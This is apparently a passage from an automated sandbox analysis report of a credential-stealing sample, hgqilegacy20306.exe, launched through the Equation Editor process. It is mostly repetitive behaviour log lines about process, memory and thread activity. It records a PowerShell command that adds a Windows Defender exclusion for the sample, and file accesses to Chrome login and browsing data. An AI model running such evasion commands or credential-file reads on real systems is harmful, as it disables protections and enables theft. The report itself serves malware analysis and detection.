                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 230000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 21E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 4E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 5B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 5850000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 6B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 7B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 25E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1779Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3707Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeWindow / User API: threadDelayed 9769Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeWindow / User API: foregroundWindowGot 1745Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3288Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3652Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3684Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe TID: 3684Thread sleep time: -5400000s >= -30000sJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3780Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1326
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1346
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00259A4C LdrInitializeThunk,LdrInitializeThunk,8_2_00259A4C
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002ACC16 mov edx, dword ptr fs:[00000030h]2_2_002ACC16
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeMemory written: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeQueries volume information: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeQueries volume information: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
